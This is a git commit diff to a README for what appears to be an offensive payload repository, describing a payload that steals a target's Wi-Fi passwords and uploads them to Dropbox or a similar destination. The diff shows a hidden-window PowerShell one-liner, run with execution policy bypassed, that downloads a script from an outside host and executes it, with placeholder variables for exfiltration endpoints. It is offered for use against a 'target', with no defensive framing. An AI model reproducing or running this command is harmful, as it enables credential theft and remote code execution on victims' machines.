Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:24:09 -06:00 committed by GitHub
parent 22f6d40108
commit 8f0eac23ff
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -37,7 +37,7 @@ This payload grabs your target's wifi passwords and uploads them to either Dropb
Fill in either or both of these to methods to exfil your collected data Fill in either or both of these to methods to exfil your collected data
``` ```
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/e8v | iex powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>